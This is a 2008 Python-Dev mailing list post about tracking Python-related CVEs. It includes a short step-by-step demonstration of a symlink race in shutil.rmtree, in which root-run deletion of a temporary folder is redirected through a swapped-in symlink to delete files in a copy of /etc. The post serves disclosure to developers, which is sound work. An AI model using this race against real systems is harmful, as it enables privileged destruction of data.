[Python-Dev] CVE tracking (original) (raw)

Mart Somermaa mrts at mrts.pri.ee
Mon Nov 24 13:05:11 CET 2008

I created a script that parses the http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=python Python-related CVE list and classifies the CVEs as follows:

The script is at http://dpaste.com/hold/92930/ The results are at http://dpaste.com/hold/92929/

There were 35 errors, 8 warnings, 5 CVEs were OK.

In an ideal world, the references would be symmetric, i.e. every Python-related CVE would have references to one or more issues in bugs.python.org and these issues would also refer back to the CVE id.

As for the rmtree problem that Gisle Aas raised, this seems to apply as of Python 2.6:

emulate removing /etc

$ sudo cp -a /etc /root/etc/ $ sudo python2.6

for i in xrange(0, 50000): ... with open("/root/etc/" + str(i), "w") as f: ... f.write("0") ... $ ls /root/etc > orig_list.txt

$ mkdir /tmp/attack $ cp -a /root/etc/* /tmp/attack

$ sudo python2.6

from shutil import rmtree rmtree('/tmp/attack')

press ctrl-z to suspend execution

^Z [1]+ Stopped sudo python2.6

$ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack $ fg sudo python2.6 Traceback (most recent call last): File "", line 1, in File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree onerror(os.rmdir, path, sys.exc_info()) File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree os.rmdir(path) OSError: [Errno 20] Not a directory: '/tmp/attack'

$ ls /root/etc > new_list.txt $ diff -q orig_list.txt new_list.txt Files orig_list.txt and new_list.txt differ

If the attack weren't possible, the lists would not differ.

More information about the Python-Dev mailing list